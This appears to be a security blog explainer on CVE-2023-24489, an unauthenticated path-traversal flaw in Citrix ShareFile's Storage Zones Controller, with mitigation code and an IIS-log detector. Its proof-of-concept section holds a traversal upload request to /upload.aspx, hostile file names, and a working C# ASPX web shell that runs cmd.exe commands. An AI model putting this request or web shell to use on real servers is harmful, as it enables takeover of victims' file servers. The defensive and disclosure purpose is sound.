In June 2023 Citrix disclosed a critical vulnerability, CVE-2023-24489, in the customer-managed Storage Zones Controller for Citrix ShareFile; Assetnote published the root-cause analysis and a working exploit the following month. Left unpatched, this bug lets an attacker take control of the affected server without any credentials. Here's a deep dive, in plain language, on how the flaw works, how attackers exploit it, and what you should do.

What is ShareFile Storage Zones Controller?

Citrix ShareFile is a widely used cloud-based file storage and sharing service for businesses. For data-residency, security or compliance reasons, some organizations keep the file data itself on their own infrastructure by deploying a customer-managed "Storage Zones Controller" (SZC) on servers they run, while the ShareFile cloud still handles the control plane.

The Storage Zones Controller is an ASP.NET application running on Windows/IIS. It exposes a web interface for uploading, downloading and managing files in the zone, and that interface is what this vulnerability targets.

What is CVE-2023-24489?

CVE-2023-24489 is a critical vulnerability in the ShareFile Storage Zones Controller. Its file upload handler can be reached by a remote, unauthenticated attacker, and the handler does not properly validate the attacker-controlled file path, so the attacker can write files outside the intended upload directory. Writing into the web root yields remote code execution (RCE) on the server. NVD classifies the root cause as improper access control (CWE-284); the path traversal is what turns that unauthenticated access into code execution.

In plain talk: someone on the Internet can take over your ShareFile storage server.

How Does the Attack Work?

Two things combine. The upload handler of the SZC (exposed at /upload.aspx) can be reached without valid authentication, and it does not canonicalize or reject dangerous sequences such as .. (dot-dot) in the user-supplied file path, so an attacker can step outside the folder the upload was meant to land in. On Windows both \ and / act as directory separators, so either spelling works.

Send a POST Request

The attacker crafts a POST request to /upload.aspx with a malicious file path such as ..\web.config, or a deeper traversal that lands inside the IIS web root, where an uploaded .aspx file is executed by the server.
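The pattern described above, reduced to a constructed Python model (this is an added example, not ShareFile's own code, which is C#/ASP.NET): the vulnerable join next to a hardened one. Because the SZC runs on Windows, the example uses ntpath so Windows path rules (drive letters, both separators, trailing-dot trimming) apply wherever you run it. UPLOAD_ROOT, the function names and the sample file names are assumptions made for the example.

```python
import ntpath

# Constructed model of the flaw, not ShareFile's own code. The SZC is an
# ASP.NET application on Windows, so Windows path rules apply; ntpath
# applies those rules on any platform. UPLOAD_ROOT is a hypothetical path.
UPLOAD_ROOT = r"C:\ShareFileStorage\Uploads"


def vulnerable_target_path(filename: str) -> str:
    """The vulnerable pattern: join the client-supplied name with no checks.

    ntpath.join behaves like .NET's Path.Combine here: '..' segments are
    kept, '/' and '\\' both separate directories, and a rooted second
    argument replaces the first one entirely.
    """
    return ntpath.normpath(ntpath.join(UPLOAD_ROOT, filename))


def safe_target_path(filename: str) -> str:
    """Hardened form: accept only a bare file name that stays under UPLOAD_ROOT."""
    # 1. The client may choose a name, never a location: reject anything that
    #    contains a directory component, a drive, or a stream ('name:stream').
    if not filename or filename != ntpath.basename(filename) or ":" in filename:
        raise ValueError(f"rejected: not a bare file name: {filename!r}")
    # 2. Windows silently trims trailing dots and spaces, so '..' or 'x.' could
    #    resolve to something else; refuse names that depend on that.
    if filename != filename.rstrip(". ") or filename in (".", ".."):
        raise ValueError(f"rejected: reserved or trailing-dot name: {filename!r}")
    # 3. Canonicalize and confirm containment, case-insensitively (NTFS).
    root = ntpath.normcase(ntpath.normpath(UPLOAD_ROOT))
    target = ntpath.normcase(ntpath.normpath(ntpath.join(root, filename)))
    if ntpath.commonpath([root, target]) != root or target == root:
        raise ValueError(f"rejected: {filename!r} escapes {UPLOAD_ROOT}")
    return ntpath.join(UPLOAD_ROOT, filename)


def is_safe(filename: str) -> bool:
    """True if the hardened check would accept the name."""
    try:
        safe_target_path(filename)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed sample names: one benign, the rest hostile.
    for name in ["report.pdf", r"..\web.config", "../../../webroot/webshell.aspx",
                 r"C:\inetpub\wwwroot\shell.aspx", "shell.aspx:hidden", ".."]:
        print(f"{name!r:45} vulnerable -> {vulnerable_target_path(name)}")
        print(f"{'':45} hardened   -> {'accepted' if is_safe(name) else 'rejected'}")
```

The containment check in step 3 is the part that matters even if steps 1 and 2 are relaxed for legitimate subfolders: resolve the full path first, then compare it against the canonical root, rather than trying to blacklist ".." substrings in the raw input.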

Proof-of-Concept (PoC) Code

Below is a simplified Python script that shows the shape of the request. It is illustrative only: it shows where the traversal sequence goes, not the full public exploit.

import requests

TARGET = "https://victim-server.com"   # placeholder host
UPLOAD_PATH = "/upload.aspx"

# Illustrative only: the file name carries the traversal sequence. Aimed at
# web.config it overwrites the application's configuration; aimed at a path
# such as ../../../webroot/webshell.aspx it drops a web shell.
with open("malicious_web.config", "rb") as payload:
    files = {
        "file": ("../web.config", payload, "application/xml")
    }
    response = requests.post(f"{TARGET}{UPLOAD_PATH}", files=files, timeout=30)

print("Status:", response.status_code)
print("Response:", response.text)

If successful, this could replace the server's configuration, or drop a backdoor web shell such as:

<%@ Page Language="C#" %>
<% if (Request["cmd"] != null) {
    // Run the command and send its output back in the HTTP response.
    var psi = new System.Diagnostics.ProcessStartInfo("cmd.exe", "/c " + Request["cmd"]);
    psi.RedirectStandardOutput = true; psi.UseShellExecute = false;
    using (var p = System.Diagnostics.Process.Start(psi)) { Response.Write(p.StandardOutput.ReadToEnd()); }
} %>

Requesting https://victim-server.com/webshell.aspx?cmd=whoami would then return the name of the account the web application runs as, confirming code execution.

Vulnerable Versions:

All customer-managed Storage Zones Controllers prior to version 5.11.24 are affected.

Attack Surface:

Anywhere /upload.aspx is reachable from the Internet. Because ShareFile clients upload to and download from the zone directly, many SZC deployments are published to the Internet, and those are at highest risk.

References & Reports

- Citrix Security Alert on CVE-2023-24489
- NVD entry for CVE-2023-24489
- Assetnote Original Exploit Writeup

Upgrade Immediately:

Citrix released Storage Zones Controller version 5.11.24 to address this vulnerability. Upgrade every controller you run, and treat a controller that was exposed and unpatched as possibly compromised until you have checked it.

Block Internet Access:

Restrict the SZC management portal and upload endpoints such as /upload.aspx to trusted source ranges (your own networks and the addresses the ShareFile cloud uses to reach the controller) rather than the whole Internet.

In Summary

CVE-2023-24489 is a major security issue: if you run a customer-managed ShareFile Storage Zones Controller and haven't patched since Citrix published the fix in June 2023, attackers can take remote control of your file server. CISA added the CVE to its Known Exploited Vulnerabilities catalog in August 2023, so assume it is being used in the wild. Act now: update your software, review your IIS logs for requests to upload.aspx carrying .. sequences and for unexpected .aspx files under the web root, and lock down your deployments.
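The log review suggested above, as an added example that is not part of the original post: a small detector run over a constructed IIS W3C log excerpt. It flags upload.aspx requests whose path or query contains a (possibly double-URL-encoded) .. segment, upload.aspx requests from outside an assumed trusted range, and any later .aspx request from an address that already sent a traversal payload, which is what a dropped web shell being used looks like. The log lines, TRUSTED_NETS and the function names are assumptions made for the example.

```python
import ipaddress
import re
from urllib.parse import unquote

# Constructed IIS W3C log excerpt, not from a real incident. The #Fields list
# is the IIS default; the detector only uses cs-method, cs-uri-stem,
# cs-uri-query and c-ip, so it works on any field order that includes them.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-12 09:14:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-12 09:14:03 10.0.0.5 POST /upload.aspx uploadid=x&filename=..%5C..%5Cweb.config 443 - 203.0.113.7 python-requests/2.31.0 - 200 0 0 31
2023-07-12 09:14:09 10.0.0.5 GET /webshell.aspx cmd=whoami 443 - 203.0.113.7 python-requests/2.31.0 - 200 0 0 12
2023-07-12 09:15:01 10.0.0.5 POST /upload.aspx uploadid=abc&filename=report.pdf 443 - 10.0.0.20 Mozilla/5.0 - 200 0 0 45
2023-07-12 09:16:22 10.0.0.5 GET /index.html - 443 - 198.51.100.9 Mozilla/5.0 - 200 0 0 5
2023-07-12 09:17:40 10.0.0.5 POST /upload.aspx uploadid=def&filename=notes.txt 443 - 198.51.100.9 Mozilla/5.0 - 200 0 0 40
"""

# Assumed trusted source ranges (your own networks and whatever the ShareFile
# cloud uses to reach the controller); replace with the real ones.
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8")]

# A '..' segment, after decoding, bounded by a separator, '=' or '&'.
TRAVERSAL = re.compile(r"(?:^|[\\/=&])\.\.(?:[\\/&]|$)")


def decode(s: str) -> str:
    """URL-decode twice so double-encoded payloads (%252e%252e) are caught too."""
    return unquote(unquote(s))


def parse_w3c(text: str):
    """Yield one dict per request line, keyed by the names in '#Fields:'."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def is_trusted(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TRUSTED_NETS)


def find_suspicious(text: str):
    """Return (reason, c-ip, method, stem, query) for every flagged request.

    Three rules, in priority order:
      1. upload.aspx reached with a '..' sequence in the stem or query;
      2. upload.aspx reached from outside TRUSTED_NETS;
      3. any later .aspx request from an IP that already fired rule 1
         (a web shell being used after it was dropped).
    """
    hits = []
    hostile = set()
    for r in parse_w3c(text):
        stem, query, ip = r["cs-uri-stem"], r["cs-uri-query"], r["c-ip"]
        stem_d = decode(stem).lower()
        to_upload = stem_d.endswith("upload.aspx")
        if to_upload and TRAVERSAL.search(stem_d + "?" + decode(query)):
            hostile.add(ip)
            reason = "traversal_in_upload"
        elif to_upload and not is_trusted(ip):
            reason = "upload_from_untrusted_ip"
        elif ip in hostile and stem_d.endswith(".aspx"):
            reason = "aspx_request_after_traversal"
        else:
            continue
        hits.append((reason, ip, r["cs-method"], stem, query))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(*hit)
```

Rule 3 only sees requests that arrive after the traversal in the same file; when hunting across rotated logs, seed the hostile set from the earlier files first. Matching the stem with endswith("upload.aspx") rather than an exact path keeps the rule working if the handler sits under a subdirectory in your deployment.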

This is a wake-up call for everyone running self-hosted components of cloud services: keep them patched, and don't expose their admin or upload interfaces to the open Internet!

Timeline

Published on: 07/10/2023 22:15:00 UTC
Last modified on: 07/18/2023 18:19:00 UTC